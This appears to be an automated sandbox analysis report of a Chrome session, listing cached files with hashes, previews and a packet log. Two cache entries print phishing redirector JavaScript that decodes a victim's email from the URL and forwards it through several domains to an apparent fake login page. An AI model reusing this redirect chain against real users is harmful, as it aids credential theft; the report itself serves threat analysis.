Preview:	L..................F.@.. ...$+.,.......`.e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Zys....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z.s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z.s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.s...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.0118899911112225
Encrypted:	false
SSDEEP:	48:8rdhQTB0obAHmidAKZdA14meh7sFiZUkmgqeh7sgMy+BX:8QXHnqMy
MD5:	F8AADC4930A55F5FB2E9C4C5B82473B4
SHA1:	B88ED0EF9C260F35A7C4D6E6E8C2739A5ADE374E
SHA-256:	A141BF2351E0DAA24E5F7F11CA072F29AAAACA97DE375D5B8F7CAD5022A5A577
SHA-512:	E4D0383928D65BA4AFBFFFDCD73630E912B675DBC3C14EAF56A868AC0D752BD1601076816FC00677898E338B48A3D19A5417FE91DF2A5C2A7226D488CEE1FD0B
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Zys....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z.s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z.s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 13:28:12 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	4.000376561044507
Encrypted:	false
SSDEEP:	48:8xjdhQTB0obmHmidAKZdA1TehDiZUkwqehyMy+R:8WXOIMy
MD5:	9834A65677385F1C33A36243D9201AF2
SHA1:	50121ADF4D38D9A543B69DC0053AF3E965DF2773
SHA-256:	867B9F467864DB7B932274A341C5EE5A8B2E0AEAF0277E3E27327F15DD26B4D6
SHA-512:	5BD75BA4E75F02A512E542AAA78A1C1045B6D33C4C69CF92A420C56D670191CCEC775FA413C025FB718029228FEA8F431C3542DB17248102116C355180ED662B
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....Q.`.e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Zys....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z.s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z.s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.s...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 13:28:12 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.986278966703407
Encrypted:	false
SSDEEP:	48:81dhQTB0obmHmidAKZdA1dehBiZUk1W1qeh0My+C:8aXe9UMy
MD5:	7AAC0D4790BB824464A2B35429460EEE
SHA1:	1F7B7119752601AA18616F0CEA38D9E5D42EE601
SHA-256:	160113DDBCBDFFB9DBF1D03856F9814079D42412B964F3E0C1616A0712C53416
SHA-512:	FF0CEC0B8E90592A8B7F186C992C02ECDC5262DE4CBEF2842A3A51CC32D36AA72D3A1DE7BE64A3D2A8D8DACD8843928749AC1BDF7DCEE8BD5E11951F8458E8E0
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....W..`.e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Zys....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z.s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z.s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.s...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 13:28:12 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.000014366143287
Encrypted:	false
SSDEEP:	48:8xdhQTB0obmHmidAKZdA1duTeehOuTbbiZUk5OjqehOuTbqMy+yT+:82XUTfTbxWOvTbqMy7T
MD5:	54E72C13ED1C4B777FAA939517DE2AED
SHA1:	14329D5F4D6739C45B15F988474B6DE450192037
SHA-256:	22CDC6BB13B743B234B63892324D19CA453254190D2A967DCA64B8B92289445F
SHA-512:	39C2C7909804855C192F2032DA7073A8DB64B9CD6A82987493986EE4DA1874620BA04567748318301505D13DDBA2752938E6E1C01C75E5711CFEBB9AF94DEDAA
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......._.e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Zys....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z.s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z.s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.s...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 63

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	TrueType Font data, 16 tables, 1st "OS/2", 11 names, Microsoft, language 0x409, \251 2010 Microsoft Corporation. All Rights Reserved.RegularSegoe UI SemilightVersion 1.00 build
Category:	downloaded
Size (bytes):	41560
Entropy (8bit):	6.533827093335207
Encrypted:	false
SSDEEP:	768:FF6XesIz0ymUHmLg0e8sSM7tq2v40ezxHJLrLFKaXhU:zlHmLFejlbqfrLFKB
MD5:	6C26C24AABE31040657665B1E0D9505C
SHA1:	B3BDC48643752665E3E5798A192B27432A87D234
SHA-256:	2D508A6E8979BBA74B6FDF804C01A09A620C781E0FEA73A8EEFDA904F5BCAB25
SHA-512:	96BD759271DF842F333B8085650DBF2006FE8E35B9485AFC91B5DE5B88D158D6147F594475FB4B5D086FA1B93720E935A346BA7D343171E6CBF8E08D4C7396EE
Malicious:	false
Reputation:	low
URL:	https://www.ofiledr.icu/auth/resources/segoeui-semilight.ttf
Preview:	............OS/2J#u@.......`VDMXvX}....l....cmap6......L....cvt .$........,fpgm.s.u...<....gasp...#........glyf.-....,..`.head..m..s<...6hhea......st...$hmtx..\...s.....kern.....w(....loca............maxp.m......... name.^.........8post.Q.w....... prep(.y.......Z.....^.......3.......3.....f................./...J........MS .....?...Q..................... ................................................................................................................................................... .....!....."... .$...!.$...".%...#.&...$.'...%.(...&.)...'....(.+...).,........+./...,.0...-.1.....2.../.2...0.4...1.5...2.6...3.7...4.8...5.9...6.:...7.<...8.<...9.=...:.>...;.?...<.A...=.B...>.D...?.E...@.E...A.F...B.G...C.H...D.I...E.J...F.K...G.L...H.M...I.O...J.P...K.Q...L.Q...M.R...N.T...O.U...P.V...Q.W...R.X...S.Y...T.Z...U.[...V.\...W.^...X.^...Y._...Z.a...[.a...\.c...].d...^.e..._.f...`.g...a.i...b.i...c.j...d.k...e.m...f.n...g.o...h.p...i.q...j.r...k.s...l.u...m.v...n.v...o

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1099
Entropy (8bit):	5.692172021818765
Encrypted:	false
SSDEEP:	24:LI+MP0iMeEbpKgEqE2qeK+C6uSfLwMSuuIXHAYbhawxmF07UF07CZQJtDYb:M+oLecgL1CT6L7H93AeaMLhsQJ52
MD5:	E793AD5A6A07B37B096ABAA335869BA8
SHA1:	B222089A582E80BE05FC08DECE66B1637266343B
SHA-256:	7AC33BF1D0EF6F35EDF84E8281AAEAB012321DEA3D47A73FA0DA0F78DAF56383
SHA-512:	6CA9E4C18BB70CA41FC43B6F7A14A2A7606D896165D10FDF6CB0B61DEDD1F794C1AAD136F24CD43157544C38D621AD0645BE607000FBC4A8563A8E8137A53B7A
Malicious:	false
Reputation:	low
URL:	https://opacks.online/
Preview:	<script type="text/javascript" >..function validateEmail(referrer) {..var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)\|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])\|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;..return re.test(referrer);..}..decodeBase64 = function(s) {..var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length;..var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";..for(i=0;i<64;i++){e[A.charAt(i)]=i;}..for(x=0;x<L;x++){..c=e[s.charAt(x)];b=(b<<6)+c;l+=6;..while(l>=8){((a=(b>>>(l-=8))&0xff)\|\|(x<(L-2)))&&(r+=w(a));}..}..return r;..}..//var ramp = window.location.hash.substring(1);..var hash = window.location.hash.substring(1);..var email = decodeBase64(hash);..console.log(email);..if(validateEmail(email)) {..console.log(email);..window.location = "https://www.ofiledr.icu/?email="+hash;..//window.location = "https://www.web-api.top/?email="+hash;..//window.location = "https://regenbogen-kueche.de/clean/token/referrer="+ema

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	40
Entropy (8bit):	4.327567157116928
Encrypted:	false
SSDEEP:	3:mSryoSbSsvVXyY:mSrFSbScVXL
MD5:	C561EA20923CC4A7C28FC7CBD47B7B27
SHA1:	2B9BEB9F18C67725EF563E8D4997075EE7FABC14
SHA-256:	CF4C2F20FC4CD264541BDAAC94B46C06A6751D614518E1185C00DEF57B835C74
SHA-512:	297F50815FA0FD8EA470E00250E3BE61529589608AC428D3D029892202B11420F394DECE84F98861AC544DE7075940ACFCCB5C93FD47E2522B0CCBB1B383DCD4
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgnx4A4Od7VvDRIFDeeNQA4SBQ3OQUx6EgUNTx8adg==?alt=proto
Preview:	ChsKBw3njUAOGgAKBw3OQUx6GgAKBw1PHxp2GgA=

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (8856), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	70357
Entropy (8bit):	5.25488159180963
Encrypted:	false
SSDEEP:	1536:5W6eapi2n4bRXk0Y2dc9PJcSdc5xTt/n+mxLpQ6+8nD+H1coqmizNQbW6jLrhZjc:Y6x4R003duPJ9d2xTt/n+mxLpQ6+8nDd
MD5:	5BE1999453FB5C6899B578DFB479EE73
SHA1:	FE5605F30343B119847ED4D475606ADDDAFA6937
SHA-256:	C4E4B4A4815A651D33E33983183E940C76D7BE3FE80AF4FD972D26302D333006
SHA-512:	D13F02CD1F33D6A9AEC8B658DBEF570D770F5B4709FC51F72F3992860946953924A6DE86D538C9A03E78F1CE66CD9DB6C877CF6E406CE84C4A0369C5ADDADC6D
Malicious:	false
Reputation:	low
URL:	https://chiltonconsultingllc.com/
Preview:	<script type="text/javascript">.function validateEmail(referrer) {.var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)\|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])\|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;.return re.test(referrer);.}.decodeBase64 = function(s) {. var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length;. var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";. for(i=0;i<64;i++){e[A.charAt(i)]=i;}. for(x=0;x<L;x++){. c=e[s.charAt(x)];b=(b<<6)+c;l+=6;. while(l>=8){((a=(b>>>(l-=8))&0xff)\|\|(x<(L-2)))&&(r+=w(a));}. }. return r;.}.//var ramp = window.location.hash.substring(1);.var hash = window.location.hash.substring(1);.var email = decodeBase64(hash);.var email64 = decodeBase64(hash);.var email2 = email64.replace('$', '@');.var hash2 = btoa(email2);..console.log(email);.if(validateEmail(email2)) {.console.log(email);.window.location = "https://opacks.online/#"+hash2;.//window.location

Chrome Cache Entry: 67

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	TrueType Font data, 18 tables, 1st "LTSH", 11 names, Microsoft, language 0x409, \251 2010 Microsoft Corporation. All Rights Reserved.RegularSegoe UI RegularVersion 0.81 Build 1
Category:	downloaded
Size (bytes):	56760
Entropy (8bit):	6.4599684161266815
Encrypted:	false
SSDEEP:	768:V6VwA2/UhWmTcrZslrc1pMEEfTsjRvlJ2LQ5XUAat0bJlZy+mO1F3iIezxHJLrLr:GwdMTwN1Dw6tewUZtyVy+mI7qfrLFKpi
MD5:	8AF990B6AD3BA192C2DD6A193890BF5F
SHA1:	4DB5BF117FF8F1392FAB3B438216D7CFF4AE4976
SHA-256:	C147C2EC76A8AB8BD5082F1F4D3F80A43C689165CB164CDD812E44048FE38708
SHA-512:	9EB10B5965EC7F272D854D46778D3F61F07EDF9E13B5B6B6184F52FB1BDEAF552756E54F7ABD0B2422CFB76AA9917FC3DB42E0CD713CC7651C2650B6D9417C0D
Malicious:	false
Reputation:	low
URL:	https://www.ofiledr.icu/auth/resources/segoeui-regular.ttf
Preview:	........... LTSHj..p...,....OS/2JUv........`VDMXvX}....x....cmap6......X....cvt \|.].........fpgm.<....<....gasp...#........glyf..G{......z.hdmxp......\...phead...F.......6hhea...B.......$hmtx..[&...(....kern...........loca.=^........maxp.U.)....... name.......8... post.Q.w...X... prep.......x...@......%..."...................................,..$..........."'..............................................................................#...$........................................................./.................................%.........3.......3.....f................./...J........MS .@...?...Q..................... ................................................................................................................................................... .....!....."... .$...!.$...".%...#.&...$.'...%.(...&.)...'....(.+...).,...*.....+./...,.0...-.1.....2.../.2...0.4...1.5...2.6...3.7...4.8...5.9...6.:...7.<...8.<...9.=...:.>...;.?...<.A...=.B...>.D...?.E...@.E...A.F...B.G

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (59458)
Category:	downloaded
Size (bytes):	114706
Entropy (8bit):	4.924852554644207
Encrypted:	false
SSDEEP:	3072:HaeJuf7Qg5MG7H+qehvP0x2pUk44Q03Pm:Qf7Qg5MG7H+qehvP0x2pUk4T0O
MD5:	8C9F31823282E4E056EB0AA7FAC262A9
SHA1:	DC3B1A37381E079FDA8DB59C1A9469852CD18B80
SHA-256:	3BB38D0F302677FF4104564454F60F495133579D6E6DFB722B3DE850DF596502
SHA-512:	39F239C875550BF9A31254EED1F0358EA3C6309D9FCBF6005D8852843EAF60BC20B8626D169F810A6C71B7DCDB769B8512314B89BA1FDEEA2CB3089BE9D21AE0
Malicious:	false
Reputation:	low
URL:	https://chiltonconsultingllc.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1
Preview:	@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100

Chrome Cache Entry: 69

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
Category:	downloaded
Size (bytes):	7886
Entropy (8bit):	3.5472733281483655
Encrypted:	false
SSDEEP:	48:g8KokgDQoxTP0Vh0jV/H2kPxL6GUEtcrCOmgfzQumtGCzYoITin0iarrWtwVWsiw:97DdTGhGW6yS7Kvs/WjiUKqWmNQOWY
MD5:	759FADE9033AA298629E4B000DCD6DDE
SHA1:	34A1ADF5C7326D7BDE5B5735471B5D81E611C189
SHA-256:	CF0808A61EC571E0C4975663903B288009D55502AC0445D9948983B339A5CF6E
SHA-512:	E96E93B13D70420D4D509D89A6337651440AE049B2A23D57C6250987003C46512C40C85C41BFA1C473A704801C961FFBE421522B89A1C34BA3B9E82A6D0769ED
Malicious:	false
Reputation:	low
URL:	https://www.ofiledr.icu/auth/resources/favicon.ico
Preview:	...... .... .....6......... ............... .h...f...(... ...@..... ..................................................................................................l.......................................................................................................o...o.6.n.f.m...m...l...l...................................................................................s.0.s.Z.r...q...p...o...o...n...m...m...l...l...........................................................w...v.K.v.x.u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
Category:	dropped
Size (bytes):	7886
Entropy (8bit):	3.5472733281483655
Encrypted:	false
SSDEEP:	48:g8KokgDQoxTP0Vh0jV/H2kPxL6GUEtcrCOmgfzQumtGCzYoITin0iarrWtwVWsiw:97DdTGhGW6yS7Kvs/WjiUKqWmNQOWY
MD5:	759FADE9033AA298629E4B000DCD6DDE
SHA1:	34A1ADF5C7326D7BDE5B5735471B5D81E611C189
SHA-256:	CF0808A61EC571E0C4975663903B288009D55502AC0445D9948983B339A5CF6E
SHA-512:	E96E93B13D70420D4D509D89A6337651440AE049B2A23D57C6250987003C46512C40C85C41BFA1C473A704801C961FFBE421522B89A1C34BA3B9E82A6D0769ED
Malicious:	false
Reputation:	low
Preview:	...... .... .....6......... ............... .h...f...(... ...@..... ..................................................................................................l.......................................................................................................o...o.6.n.f.m...m...l...l...................................................................................s.0.s.Z.r...q...p...o...o...n...m...m...l...l...........................................................w...v.K.v.x.u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 15:28:07.642118931 CET	49673	443	192.168.2.16	204.79.197.203
Jan 13, 2025 15:28:07.944837093 CET	49673	443	192.168.2.16	204.79.197.203
Jan 13, 2025 15:28:08.550790071 CET	49673	443	192.168.2.16	204.79.197.203
Jan 13, 2025 15:28:09.761887074 CET	49673	443	192.168.2.16	204.79.197.203
Jan 13, 2025 15:28:10.402010918 CET	49689	80	192.168.2.16	192.229.211.108
Jan 13, 2025 15:28:11.241410017 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.241470098 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.241672039 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.242050886 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.242079020 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.242136002 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.242374897 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.242389917 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.242626905 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.242644072 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.708451986 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.708729029 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.708751917 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.709784031 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.709856033 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.710786104 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.710854053 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.710973024 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.724833012 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.725095987 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.725120068 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.726152897 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.726231098 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.726502895 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.726568937 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.751326084 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.751820087 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.751827955 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.767802000 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.767816067 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:11.799812078 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:11.815800905 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.166821957 CET	49673	443	192.168.2.16	204.79.197.203
Jan 13, 2025 15:28:12.641980886 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.642026901 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.642054081 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.642083883 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.642095089 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.642112017 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.642119884 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.642121077 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.642162085 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.642167091 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.642174006 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.642400980 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.642466068 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.655986071 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.656017065 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.656050920 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.656191111 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.656189919 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.656189919 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.656263113 CET	443	49710	172.67.147.135	192.168.2.16
